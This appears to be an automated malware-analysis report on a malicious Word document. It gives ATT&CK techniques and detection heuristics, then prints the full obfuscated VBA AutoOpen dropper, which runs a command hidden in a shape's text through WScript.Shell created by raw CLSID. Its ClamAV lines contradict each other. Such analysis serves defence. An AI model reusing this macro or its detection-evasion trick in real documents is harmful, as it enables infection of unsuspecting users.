Verdict: MALICIOUS
Risk Score: 252

Malware Insights

MITRE ATT&CK

- T1059.001 PowerShell
- T1218.011 System Binary Proxy Execution: Rundll32
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
The sample contains VBA macros that leverage the `WScript.Shell` COM object, a known indicator of malicious activity. The `AutoOpen` macro and the reference to PowerShell suggest an attempt to download and execute a secondary payload. The embedded VBA script is heavily obfuscated, but the presence of `WScript.Shell` and the PowerShell reference strongly indicate downloader or dropper functionality.
Heuristics (9)

- ClamAV: Doc.Malware.Powload-6779192-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Powload-6779192-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- VBA instantiates a dangerous COM class by CLSID (critical, OLE_VBA_GETOBJECT_CLSID_DANGEROUS): VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on. Matched line in script: `End Select Set oZAdYfdi = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + VoIZdpM + afGinm + fvTTWdaK + YLAVBalq)) On Error Resume Next`
- GetObject call (high, OLE_VBA_GETOBJ): GetObject call. Matched line in script: `End Select Set oZAdYfdi = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + VoIZdpM + afGinm + fvTTWdaK + YLAVBalq)) On Error Resume Next`
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): AutoOpen macro. Matched line in script: `Attribute VB_Customizable = True Sub AutoOpen() On Error Resume Next`
- Reference to PowerShell (high, SC_STR_POWERSHELL): Reference to PowerShell
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5293 bytes |

SHA-256: 78fc72d9d284507f066b0106f647b2820db8fae4401ff31e83a5943d77e5146a

Detection

- ClamAV: No threats found
- Obfuscation or payload: likely. 110 of 178 identifiers look randomly generated (e.g. 'wIEaqKWmdfnQ'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "HXbEGlvJu"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case qbkOiN
Case 68375030
wwhRw = CBool(AGjGHml)
NtfrmsrU = 84320892
hUGcX = CBool(tTwTqZi)
Case 182965248
CkdEoYC = CBool(JNqjqaS)
clXkd = Atn(XiIMnn)
qnLDUk = CBool(OPYli)
zOjsDtfJO = Atn(263063334 * CLng(73465813))
End Select
On Error Resume Next
Select Case czHQI
Case 166725721
hszikLlr = CBool(cmiUXjT)
vrXinBw = 117412365
QddWKO = CBool(kOaUXd)
Case 270118713
JjFAZpivd = CBool(VQBHuqC)
QvHNGS = Atn(UkIGwHR)
cYGww = CBool(iliAupzMc)
jSKNtn = Atn(315809158 * CLng(169611293))
End Select
On Error Resume Next
Select Case aZmLS
Case 23331969
fTpGzrZfT = CBool(pRbsQkpvp)
ADbqnv = 175747867
aZPhqao = CBool(LIpmOVs)
Case 253360620
DlIKow = CBool(disbrz)
CQAFuf = Atn(aBEmZ)
FCFfLock = CBool(SOmcw)
HiMlM = Atn(272740918 * CLng(257945701))
End Select
Set PwGFdk = Shapes("wIEaqKWmdfnQ")
On Error Resume Next
Select Case vWcwh
Case 169456876
KRNXC = CBool(rtlzEVA)
SlvwEsb = 262111437
uSYlXKPSi = CBool(WwIzT)
Case 136223296
wktYsNod = CBool(ljAdhZW)
SEdnUi = Atn(iZMifJl)
bPvquZC = CBool(jHvYi)
Bawaph = Atn(95267664 * CLng(282738003))
End Select
kaPfk = "" + AEYNli + XtSAK + QAtjZKnM + hFUENkO + PwGFdk.TextFrame.TextRange.Text + opOzvROz + WfjEZIcY + rkhvO
On Error Resume Next
Select Case ralwiamES
Case 103999769
zMWQcKPWV = CBool(QQwPGCkPB)
WZADPq = 274745432
JAXBwv = CBool(LtAjbDzp)
Case 327071244
KmicXCo = CBool(BbZMTA)
VENVWPRD = Atn(uIkjaLWk)
cFDGh = CBool(wikzTGzZ)
zGwmU = Atn(176728640 * CLng(74010118))
End Select
On Error Resume Next
Select Case vUhus
Case 88728886
CMHtkT = CBool(zOokq)
sYtcNKRjv = 39666124
dhjaZiQw = CBool(ioOtDnLI)
Case 309266648
fNjwQWa = CBool(jhwbG)
UQDnh = Atn(kXnCHDK)
YawIo = CBool(aZwkQEz)
jPrHiIZ = Atn(258625567 * CLng(233788732))
End Select
On Error Resume Next
Select Case JlYJsA
Case 31432039
vTPsG = CBool(HSJWNsY)
PrCjKvLsK = 230496179
XmiGSuE = CBool(XZYSsLFq)
Case 262037486
FBUuLWjHL = CBool(JpCJjQjkd)
qbIGAY = Atn(ZJUFFXwFh)
cbHaL = CBool(OciXPlcc)
NcFdsN = Atn(296920009 * CLng(261259652))
End Select
On Error Resume Next
Select Case LzmfZzT
Case 262855450
iaWcVXia = CBool(MFXDpPlL)
MEAfScl = 163112288
plmXoL = CBool(wwXfstHIV)
Case 23239767
EHHWuOaH = CBool(iDIuqwFt)
zoQLMrQO = Atn(iSzsJOph)
KSqXzh = CBool(Mvqcpwo)
SYOVsv = Atn(108606244 * CLng(43866728))
End Select
Set oZAdYfdi = CVar(GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8" + VoIZdpM + afGinm + fvTTWdaK + YLAVBalq))
On Error Resume Next
Select Case krBTKrUF
Case 194695741
vNNfCYvb = CBool(EoVRW)
vFFmPrNi = 124189189
YIjjwKvr = CBool(LJshpzz)
Case 165465746
qwOaffOlO = CBool(Nqhiuw)
POrFuti = Atn(KiDXQmQSX)
WUzdBUKv = CBool(dfdazlL)
khkwDjiU = Atn(4037643 * CLng(78007216))
End Select
On Error Resume Next
Select Case WYwRaXkY
Case 25276366
wBFNjZAOX = CBool(AwOiTrjLs)
JILJUm = 18066899
okUvzQz = CBool(TFEcOwUIf)
Case 171130406
OwjoY = CBool(onppvtuW)
amiFzzk = Atn(YiHQAN)
DiucndEw = CBool(PIdHJXMJG)
VidaaMdiL = Atn(62051919 * CLng(114890501))
End Select
Const lGLXjE = 0
On Error Resume Next
Select Case wFctiSnY
Case 26204109
qNcMO = CBool(AVVIOYhbZ)
Iazth = 15729994
WECTE = CBool(NUubTT)
Case 119225001
KwqzQMG = CBool(YYAUaKM)
KXoJFIL = Atn(wDIoUzN)
HhziG = CBool(QpwwjiTkr)
HUQwf = Atn(59551597 * CLng(112995466))
End Select
oZAdYfdi.Run kaPfk, lGLXjE
On Error Resume Next
Select Case lLnAbE
Case 135102571
BXSMjJ = CBool(dHBbJirpA)
FPSRXr = 37736224
XDtuXsw = CBool(lXKfZN)
Case 63365356
bAYBrj = CBool(WmoWpBwif)
hJGwjj = Atn(fuwUi)
lrGDpWT = CBool(nrJXH)
VHMosiTs = Atn(28438263 * CLng(21514151))
End Select
On Error Resume Next
Select Case aACphzKYD
Case 1641119
AwlDuuPO = CBool(QoYSCNi)
XNjpNO = 40906173
ibvAFXpvI = CBool(murKY)
Case 78937904
Xalcj = CBool(TTzBqQzn)
fDPSTOWs = Atn(dJzakTMpX)
pnUXupbh = CBool(WziKQ)
PovGs = Atn(309619591 * CLng(9927627))
End Select
On Error Resume Next
Select Case QQbwObzrP
Case 65138532
jLIBIZDKM = CBool(lUzzTZqhq)
Bwthpckcj = 251331160
aVwrDajK = CBool(vctwfviw)
Case 311297369
HKZPq = CBool(SbMfoada)
LwwHQ = Atn(GXEwYDvCt)
mjfidAGIH = CBool(zXizUwSs)
zfqiCB = Atn(256402581 * CLng(138032789))
End Select
End Sub
```